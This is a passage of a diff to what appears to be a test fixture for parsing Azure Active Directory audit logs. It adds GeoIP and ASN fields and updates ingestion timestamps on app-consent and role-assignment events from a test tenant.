",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlati
onId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: 
fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17861,6 +18989,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -18030,7 +19170,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125386800Z", + "ingested": "2021-12-14T14:48:43.176743809Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlati
onId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: 
fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18057,6 +19197,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -18226,7 +19378,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125393200Z", + "ingested": "2021-12-14T14:48:43.176744430Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlati
onId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: 
fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18253,6 +19405,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -18415,7 +19579,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125396900Z", + "ingested": "2021-12-14T14:48:43.176744890Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"
Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"
\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18442,6 +19606,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -18604,7 +19780,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125401700Z", + "ingested": "2021-12-14T14:48:43.176745399Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"
Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name